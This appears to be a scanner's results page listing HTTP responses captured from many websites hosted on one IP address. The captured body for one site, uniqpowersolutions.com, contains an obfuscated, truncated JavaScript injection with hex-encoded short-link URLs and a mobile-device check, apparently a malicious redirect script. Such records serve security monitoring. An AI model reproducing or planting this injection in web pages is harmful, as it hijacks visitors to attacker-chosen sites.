    		width: 100px;
    		height: 100px;
    	}
    	h2{
    		font-size: 20px;
    		color: <?echo $ucmm_footer_text_color?>;
    		margin: 0;
    		font-family: inherit;
    	}
    	h2 a{
    		color: inherit;
    	}
    	.footer-love {
    		color: #fff;
    		padding: 20px;
    		padding-bottom: 5px;
    		width: 100%;
    		box-sizing: border-box;
    		text-align: right	}
    	.footer-love a{
    		text-decoration: none;
    		color: #fff;
    	}
    	.footer-love a:hover{
    		color: #3BB9FF;
    	}
    	/* Icons style start here */
    	.ucmm-social-icons{
    	}
    	.ucmm-icon{
    		width: 40px;
    		height: 40px;
    		display: inline-block;
    		line-height: 40px;
    		border-radius: 50%;
    		margin: 5px;
    	}
    	.ucmm-icon .fab{
    		color: #fff;
    		vertical-align: middle;
    		font-size: 18px;
    		line-height: 40px;
    	}
    	.ucmm-facebook-icon{
    		background: #4266C9;
    				display: none;
    			}
    			#customize-control-ucmm_wpbrigade_customization-ucmm_display_footer_text_position {
    			display: none !important;
    		}
    		.footer-love, .footer-love a {
    		color: #fff	}
    	.ucmm-twitter-icon{
    		background: #000;
    					display: none !important;
    			}
    	.ucmm-linkedin-icon{
    		background: #2867B2;
    				display: none;
    			}
    	.ucmm-google-icon{
    		background: #d34836;
    				display: none;
    			}
    	.ucmm-youtube-icon{
    		background: #FF0000;
    				display: none;
    			}
    	.ucmm-instagram-icon{
    		background: #DD2A7B;
    				display: none;
    			}
    	.ucmm-pinterest-icon{
    		background: #BD081C;
    				display: none;
    			}
    	.ucmm-codepen-icon{
    		background: #000;
    				display: none;
    			}
    
    	/*----- schedule time-----*/
    	.ucmm_schedule_time{
    		padding-top: 15px;
    		font-size: 50px;
    		color: <? echo $ucmm_time_text_color?>;
    		height: 100%;
        display: flex;
        align-items: flex-start;
        padding-bottom: 20px;
        box-sizing: border-box;
    }
    @media only screen and (max-width: 600px) {
    	h1{
    		font-size:40px;
    	}
    }
    .ucmm-twitter-icon svg path{
        fill: #fff;
    }
    .ucmm-twitter-icon svg{
        width: 20px;
        height: 20px;
        vertical-align: middle;
    }
    .ucmm-twitter-icon {
        display: inline-flex;
        align-items: center;
        justify-content: center;
        vertical-align: middle;
    }
    		
    	</style>
    
    </head>
    <body>
    	<div class="ucmm-logo">
    
    	 <img src="" style="display:none"  >
    
    		<h1>
    		LET ME COOK!		</h1>
    		<h2>
    				 </h2>
    
    	</div>
    
    	<div class="ucmm_schedule_time"> </div>
    
    	</div>
    	
    </body>
    
    </html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.bestdevicenation.com

    2026-01-02 07:05

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1602
    date: Fri, 02 Jan 2026 07:05:22 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="182461095">2025-09-30 19:38</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="error_log"><a href="/error_log"><img class="icon" src="/_autoindex/assets/icons/file.svg" alt="File">error_log</a></td><td data-sort="1761131958">2025-10-22 11:19</td><td data-sort="2242">      3k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.bestdevicenation.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nccstrongnation.org.uk

    2026-01-02 07:00

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://nccstrongnation.org.uk/
    content-length: 0
    date: Fri, 02 Jan 2026 07:00:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nccstrongnation.org.uk

    2026-01-02 06:58

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://nccstrongnation.org.uk/wp-json/>; rel="https://api.w.org/"
    link: <https://nccstrongnation.org.uk/wp-json/wp/v2/pages/23821>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://nccstrongnation.org.uk/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 06:58:14 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · sukasawit.love

    2026-01-02 06:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1365
    date: Fri, 02 Jan 2026 06:35:25 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="190535341">2026-01-02 06:29</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at sukasawit.love Port 80</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · sukasawit.love

    2026-01-02 06:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1366
    date: Fri, 02 Jan 2026 06:35:25 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="190535341">2026-01-02 06:29</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at sukasawit.love Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.promosambevcr.devdecimosite2025.com

    2026-01-02 06:33

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://promosambevcr.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 02 Jan 2026 06:33:38 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.bokitas.devdecimosite2025.com

    2026-01-02 06:32

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1161
    date: Fri, 02 Jan 2026 06:32:45 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.bokitas.devdecimosite2025.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · cccapintel.com

    2026-01-02 06:22

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://cccapintel.com/wp-json/>; rel="https://api.w.org/"
    link: <https://cccapintel.com/wp-json/wp/v2/pages/16>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://cccapintel.com/>; rel=shortlink
    etag: "215-1767177030;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 06:22:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · testnews.cdcit.in

    2026-01-02 06:19

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://testnews.cdcit.in/wp-json/>; rel="https://api.w.org/"
    link: <https://testnews.cdcit.in/wp-json/wp/v2/pages/26>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://testnews.cdcit.in/>; rel=shortlink
    etag: "356044-1767239408;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 06:19:48 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.uniqpowersolutions.com

    2026-01-02 06:09

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    set-cookie: PHPSESSID=fc2d6fd1913c5e6addb103ee67117cf7; path=/; secure
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://uniqpowersolutions.com/
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 1e4_front,1e4_URL.6666cd76f96956469e7be39d750cc7d9,1e4_F,1e4_Po.69,1e4_PGS,1e4_
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 06:09:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x62\x65\x53\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6b\x67\x74\x35\x63\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x72\x43\x67\x38\x63\x318','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x67\x78\x79\x39\x63\x309','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x66\x74\x4f\x34\x63\x364','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x65\x75\x4a\x37\x63\x357','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x73\x6f\x4c\x32\x63\x382','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x61\x41\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · uniqpowersolutions.com

    2026-01-02 06:02

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    set-cookie: PHPSESSID=e7bcfd4476591b28469090f0ff21179a; path=/; secure
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    content-type: text/html; charset=UTF-8
    link: <https://uniqpowersolutions.com/wp-json/>; rel="https://api.w.org/"
    link: <https://uniqpowersolutions.com/wp-json/wp/v2/pages/69>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://uniqpowersolutions.com/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 1e4_front,1e4_URL.6666cd76f96956469e7be39d750cc7d9,1e4_F,1e4_Po.69,1e4_PGS,1e4_
    etag: "371551-1767333738;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 06:02:18 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.brilliantsit.com

    2026-01-02 05:36

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 02 Jan 2026 05:36:53 GMT
    server: LiteSpeed
    location: https://ninetyninecreatives.com/
    vary: Accept-Encoding
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.newstest.cdcit.in

    2026-01-02 05:31

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1373
    date: Fri, 02 Jan 2026 05:31:50 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="188129394">2025-12-05 10:09</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.newstest.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · newstest.cdcit.in

    2026-01-02 05:31

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1369
    date: Fri, 02 Jan 2026 05:31:50 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="188129394">2025-12-05 10:09</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at newstest.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadyside43947.com

    2026-01-02 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sun, 09 Nov 2025 07:11:10 GMT
    accept-ranges: bytes
    content-length: 7974
    date: Fri, 02 Jan 2026 05:16:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "master.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <meta content="Shadyside, Ohio 43947" name="keywords">
    <meta content="Shadyside, Ohio" name="description">
    <!-- #EndEditable -->
    <link href="styles/style0.css" media="screen" rel="stylesheet" title="CSS" type="text/css" />
    <style type="text/css">
    .auto-style1 {
    	font-size: large;
    }
    </style>
    </head>
    
    <body>
    <div id="container">
    <div id="lftcontainer" style="width: 169px; height: 244px">
    	<img src="images/custom_corner_street_sign.png" alt="Street sign" width="179" style="padding-top:20px" height="149"/>
    	<br><br><p class="auto-style1">shadyside43947.com</p>
    	</div>
    <!-- Begin Container -->
    <div id="rtcontainer">
    	<!-- Begin Masthead -->
    	<div id="masthead" style="height: 302px">
    		<div id="videobox" style="width:100%;height:109%" class="centercontent">
    		
    			<img alt="Bailing boat" height="283" src="images/doing_all_the_work_21647.gif" width="444"></div>
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="https://www.shadysideoh.com">Home</a></li>
    			<!--li><a href="about_me/default.html">About Me</a></li-->
    			<!--li><a href="resume/default.html">R&eacute;sum&eacute;</a></li-->
    			<!--li><a href="photo_gallery/default.html">Photo Gallery</a></li-->
    			<!--li><a href="links/default.html">Links</a></li-->
    			<!--li><a href="contact/default.html">Contact</a></li-->
    		</ul>
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin content_container -->
    	<div id="content_container">
    		<!-- Begin Left Column -->
    		<div id="column_left">
    			<!-- #BeginEditable "content" -->
    			
    		<div id="column_left0">
    
    			<div class="centercontent">			
    				<h2 >New Levi defeated</h2>
    				<h3 >Levi goes up in Smoke!</h3>
    				<p style="text-align:center">
    				<img alt="Up in Smoke" src="images/explosion_300_clr_8784.gif" height="220" width="220"  ></p>
    				<p style="text-align:left">In the November 4, 2025 Shadyside Village election, it has been reported that the new levi was defeated  
    				soundly by 317 votes for and 614 against. While most of the village's levis pass by a 60/40 margin, this one only had a 34% approval rating. 
    				Over 65% of the electorate finally opened their eyes to the constant begging for more money.  </p>
    					   				
    				<p style="text-align:left">The village had two other renewal levis on the same ballot. Adding a new request for money while asking to 
    				renew two others was rather foolish. Maybe they wanted to get ahead of the state in the state's attempts to restrict property taxes. </p>
    				<p >&nbsp;</p>
    			</div>
    
    			
    			<div class="centercontent">			
    				<h2 >Swimming Pool Gutted?</h2>
    				<h3 >Tim Merryman and Council Canabalizes Swimming Pool</h3>
    				<p style="text-align:center">
    				<img alt="Swim" src="images/stick_figure_treading_water_150_wht_6482.gif" height="218" width="273"  ></p>
    				<p style="text-align:left">In the April 22, 2019 Shadyside Village Council report, it has been reported that councilman Tim Merryman proposed, and had approved, that the swimming pool 
    					be canabalized and given away. Powhatan had expressed an interest in equipment at our pool. The equipment appears to be given away for free to Powhatan by council. 
    					It’s a sign that the council is definitely planning on giving everything there away and forcing a new school upon us.    </p>
    				<p >&nbsp;</p>
    			</div>
    			
    			<!--div class="centercontent">
    			<h2 class="centercontent">Water Prices Rise Again&nbsp;</h2>
    			<h3 class="centercontent">Going From $30 to $54</h3>
    			<p style="text-align:center">
    			<img alt="Water" src="images/construction_pipes_turn_valve_400_clr_8575.png" height="218" width="273"  ></p>
    			<p>Water prices are about to go up again. After the first of the year (2019) water rates are to go to $18.00 per thousand gallons.
    			There will be a minimum of 3000 gallons with this rate. That
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadyside43947.com

    2026-01-02 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Fri, 02 Jan 2026 05:16:18 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadyside43947.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadysideoh.com

    2026-01-02 05:15

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 12:28:51 GMT
    accept-ranges: bytes
    content-length: 14297
    date: Fri, 02 Jan 2026 05:15:32 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: ShadysideOh
    
